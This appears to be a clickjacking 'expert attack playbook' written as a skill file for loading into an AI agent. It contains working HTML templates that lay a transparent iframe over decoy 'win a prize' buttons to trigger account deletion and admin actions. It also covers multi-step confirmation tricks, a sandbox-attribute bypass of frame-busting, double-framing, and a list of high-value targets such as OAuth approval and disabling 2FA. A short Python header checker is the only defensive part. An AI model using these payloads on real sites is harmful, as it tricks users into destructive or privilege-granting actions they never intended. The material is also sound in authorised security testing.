clickjacking


SKILL: Clickjacking — Expert Attack Playbook


AI LOAD INSTRUCTION: Clickjacking (UI redress) techniques. Covers iframe transparency tricks, X-Frame-Options bypass, CSP frame-ancestors, multi-step clickjacking, drag-and-drop attacks, and chaining with other vulnerabilities. Often a "low severity" finding that becomes critical when targeting admin actions.

1. CORE CONCEPT


Clickjacking loads a target page in a transparent iframe overlaid on an attacker's page. The victim sees the attacker's UI but clicks on the invisible target page, performing unintended actions.
```html
<style>
  iframe { position: absolute; top: 0; left: 0; width: 100%; height: 100%; opacity: 0.0001; z-index: 2; }
  .decoy { position: absolute; top: 200px; left: 100px; z-index: 1; }
</style>
<div class="decoy"><button>Click to win a prize!</button></div>
<iframe src="https://target.com/account/delete?confirm=yes"></iframe>
```


2. DETECTION — IS THE PAGE FRAMEABLE?


Check X-Frame-Options Header


```text
X-Frame-Options: DENY           → cannot be framed (secure)
X-Frame-Options: SAMEORIGIN     → only same-origin framing (secure for cross-origin)
X-Frame-Options: ALLOW-FROM uri → deprecated, browser support inconsistent
(header absent)                 → frameable! (vulnerable)
```

Check CSP frame-ancestors


```text
Content-Security-Policy: frame-ancestors 'none'         → cannot be framed
Content-Security-Policy: frame-ancestors 'self'         → same-origin only
Content-Security-Policy: frame-ancestors https://a.com  → specific origin
(directive absent)                                      → frameable
```
CSP frame-ancestors supersedes X-Frame-Options in modern browsers.

Quick PoC Test


```html
<iframe src="https://target.com/sensitive-action" width="800" height="600"></iframe>
```
If the page loads in the iframe → frameable → potentially vulnerable.

JavaScript Frame Detection (from target page source)


```javascript
// Common frame-busting code found in target pages:
if (top.location.hostname !== self.location.hostname) {
    top.location.href = self.location.href;
}
```
If this code is present but the page does not also send CSP frame-ancestors, it can often be bypassed.
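As an added example that is not part of the original playbook, the header rules of this section (together with the ALLOW-FROM behaviour described under Bypass Techniques) written as a Python check that a defender can run over collected response headers; the attacker origin and the HARDENED_HEADERS name are constructed for the example, and only exact origins, 'self', 'none' and '*' are matched.

```python
# Added example (not from the playbook): decide whether a page with the given
# response headers can be embedded by a page at framer_url, applying the
# X-Frame-Options / CSP frame-ancestors rules above. Only exact origins,
# 'self', 'none' and '*' are matched; CSP host wildcards are out of scope.
from urllib.parse import urlsplit

def origin_of(url):
    """Lower-cased scheme://host[:port] of a URL."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()

def frame_ancestors(csp):
    """Source list of the frame-ancestors directive, or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None

def can_frame(headers, page_url, framer_url):
    """Return (allowed, reason). A CSP frame-ancestors directive, when present,
    takes precedence over X-Frame-Options, as in current browsers."""
    h = {k.lower(): v for k, v in headers.items()}
    page, framer = origin_of(page_url), origin_of(framer_url)
    sources = frame_ancestors(h.get("content-security-policy", ""))
    if sources is not None:
        if "'none'" in sources:
            return False, "CSP frame-ancestors 'none'"
        if "'self'" in sources and page == framer:
            return True, "CSP frame-ancestors 'self' (same-origin embed)"
        if "*" in sources or framer in sources:
            return True, "CSP frame-ancestors lists the framing origin"
        return False, "CSP frame-ancestors excludes the framing origin"
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False, "X-Frame-Options: DENY"
    if xfo == "SAMEORIGIN":
        return page == framer, "X-Frame-Options: SAMEORIGIN"
    if xfo.startswith("ALLOW-FROM"):
        return True, "ALLOW-FROM is deprecated and ignored by Chrome/Safari"
    return True, "no framing restriction sent"

# Header set that closes the findings above: CSP for modern browsers plus the
# legacy header for clients that do not implement frame-ancestors.
HARDENED_HEADERS = {
    "Content-Security-Policy": "frame-ancestors 'none'",
    "X-Frame-Options": "DENY",
}

def is_clickjackable(headers, page_url, attacker_url="https://attacker.invalid"):
    """True when an unrelated origin (constructed placeholder) could embed the page."""
    return can_frame(headers, page_url, attacker_url)[0]
```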


3. PROOF OF CONCEPT TEMPLATES


Basic Single-Click


```html
<html>
<head><title>Free Prize</title></head>
<body>
<h1>Click the button to claim your prize!</h1>
<style>
  iframe { position: absolute; top: 300px; left: 60px;
           width: 500px; height: 200px; opacity: 0.0001; z-index: 2; }
</style>
<iframe src="https://target.com/account/settings?action=delete"></iframe>
</body>
</html>
```

Multi-Step Clickjacking


For actions requiring multiple clicks (e.g., "Are you sure?" confirmation):
```html
<div id="step1">
  <button onclick="document.getElementById('step1').style.display='none';
                    document.getElementById('step2').style.display='block';">
    Step 1: Click here
  </button>
</div>
<div id="step2" style="display:none">
  <button>Step 2: Confirm</button>
</div>
<iframe src="https://target.com/admin/action"></iframe>
```
Reposition the iframe for each step so the transparent button lines up with the decoy.

Drag-and-Drop Clickjacking


Extract data from one iframe to another using HTML5 drag-and-drop events — the victim drags across invisible iframes, transferring tokens or data.


4. BYPASS TECHNIQUES


Frame-Busting Script Bypass


Some pages use JavaScript frame-busting:
```javascript
if (top !== self) { top.location = self.location; }
```
Bypass with the sandbox attribute:
```html
<iframe src="https://target.com" sandbox="allow-forms allow-scripts"></iframe>
<!-- sandbox without allow-top-navigation prevents frame-busting -->
```

X-Frame-Options ALLOW-FROM Bypass


ALLOW-FROM is not supported in Chrome/Safari. If the server relies solely on ALLOW-FROM, modern browsers ignore it → page is frameable.

Double-Framing


If X-Frame-Options: SAMEORIGIN is set, but a same-origin page exists that can be framed (without XFO), use that page as an intermediary to frame the target.


5. HIGH-IMPACT TARGETS


```text
Account deletion page
Email/password change form
Admin panel actions (add user, change role)
Payment confirmation
OAuth authorization ("Allow" button)
Two-factor authentication disable
API key generation
Webhook configuration
```


6. TESTING CHECKLIST


□ Check X-Frame-Options header on sensitive pages
□ Check CSP frame-ancestors directive
□ Create iframe PoC and verify page loads
□ Test frame-busting scripts — try sandbox attribute bypass
□ Identify high-value single-click actions
□ For multi-step actions, build multi-click PoC
□ Test both authenticated and unauthenticated pages
□ Verify ALLOW-FROM behavior across browsers